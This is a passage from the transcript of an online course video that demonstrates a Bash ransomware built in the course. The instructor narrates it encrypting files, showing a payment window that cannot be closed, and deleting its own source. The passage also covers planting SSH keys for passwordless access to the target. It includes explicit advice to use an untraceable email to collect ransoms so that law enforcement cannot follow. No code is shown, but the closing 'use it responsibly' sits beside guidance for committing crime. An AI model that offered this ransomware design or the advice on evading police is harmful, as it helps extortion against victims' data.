we are no longer attacking the target user, so we're going to make use of our text folder, the one we made use of while we were testing the build of our advanced ransomware. All right, so that is it. Okay, so I'm going to cancel this. Let's just do this again for safety purposes. All right, so I'm going to run this. So it's encrypting. All right, so see, I've now been given this display here. So if I try to cancel, you see, I'm not able to exit this window. So the user will not be able to exit this window until he or she makes the payment. So if I click on, even though the user closes this window, the ransomware will still run. It will still run and also encrypt itself and delete its source code. So either way, the user has to pay your ransom or pay you the money. All right. So if I click on pay now, you can see enter the amount to pay. So if I say 45, which is the ransom, processing payment of 45. So I'm going to click on OK. So we now have you are doomed. You see, it's still encrypted, processing payment of 45. Now, if you notice, this background is still here. So a fix for that is to supply a clear after this. So clear, Control S. You see that even though the user paid or the user cancelled the dialog, it's still encrypted itself. All right. So that is the advantage. So since I've made changes now, I'm going to run this again. Encrypting. All right. So if I click on pay now, sorry, if I 45. All right. So you can see you are doomed. We still have it encrypted. So the user has to pay, even though the user exit the window, he or she still has to pay the money. Either way, they have to pay. All right. Okay, so that is how to create the advanced bash ransomware. Okay, so thank you and see you in the next video. But before I go, if you remember the moment we're creating the key-based authentication or the passwordless authentication for SSH. Now, what we did was we created this key-based authentication so that the server or the target user, which is a Linux mate, will be able to SSH into our hacker machine or this Kali Linux machine without having to type in a password. All they have to do is to what? To supply or present their private key, which Kali Linux we compare with the public key it has. If you remember, we made use of what? SSH copy ID to copy the public key of the Linux mint to our Kali Linux, right? So that is the public key, the Kali Linux we use to compare with the private key presented by the target user or the Linux Mint. But if you also want Kali Linux, or as a hacker, you want your machine to be able to connect successfully to the Linux Mint or to your target machine without you having to enter the target machine's password, you also need to do the same thing. What you have to do is what? You generate the SSH key on your Kali Linux or on your machine. Then you use this command here to copy your public key to the server or to the target machine, in this case the Linux Mint. And then from there, when you try to SSH into the target machine or to the Linux Mint machine, you won't have to type in the password of the Linux machine or of the target machine. All you have to do is to present your private key, which Linux Mint or the target machine will use to compare with your public key, which it already has, to verify if the connection is authentic. All right, so that is all about the advanced bash ransomware. And we fulfilled all the 5 features of the advanced bash based ransomware. So see you in the next video. All right, so welcome. I just had to do this video to explain something to you. All right. Okay, so if you remember from the previous video, when we executed this advanced bash based ransomware, the user was being shown this dialog, or this widget here were displayed to the user, informing the user to make a payment because his or her files have been restricted. All right. Then we have the dialog here where the user is to enter the amount to pay. Okay. So in a real life scenario, you can decide to use maybe your programming knowledge or maybe scripting knowledge to be able to receive the payment from the user. All right. Or even though you don't want to include this payment input box, what you can do is you can just maybe after the user enter the amount to pay, or you can just um, erase this particular place. That is, you can just erase this place, enter amount to pay, and just give a description of, for example, maybe your email address, but it's not good to expose yourself like that. Maybe you can use a temporary email address, or you can use something that is not traceable to you, all right? So that you don't have the law enforcement agencies chasing after you, all right? So what you can do is you can use, maybe you can just leave here, and maybe you can just come over to this place here, this message box. Maybe you can start doing something like contact me at johndoe@yahoo.com to obtain the keys or password to recover your files, or make a payment to me at so address. All right. So that is what I just have to say with this video. All right. Okay. So see you in the next video. Hey everyone, congratulations on making it to the end of this course. You have just taken a deep dive into bash scripting for cybersecurity, specifically how ransomware works at the script level. Understanding this technology is crucial for both offense and defense in cybersecurity. I hope you now have the skills to analyze, experiment, and improve your scripting abilities. You can still add more features to the advanced bash-based ransomware if you want. All right, so throughout this course, we covered forging the hacker's blade, where we talked about lab environment setup, the shell's secret arsenal, where we talked about the Linux command, and the secret of the cipher, where we learned about cryptography, and also cryptic connections, where we learned about remote access and file transfer, and also the invisible ransom, where we talked about ransomwares, and also building a basic bash ransomware where we build the basic bash ransomware, and lastly building the advanced bash ransomware where we build the advanced bash based ransomware. This knowledge is powerful and I encourage you to use it responsibly. Cybersecurity is about continuous learning and staying ahead of threats. All right, so before you go, I have a few important requests. Please leave a review. Your feedback helps me improve this course and reach more students. If you enjoyed it, I would love to hear your thoughts. Practice and experiment. So don't just stop here. Start modifying script, test in a lab environment, and even create your own cybersecurity tools. I truly appreciate you taking the time to learn with me. Keep hacking ethically. Keep scripting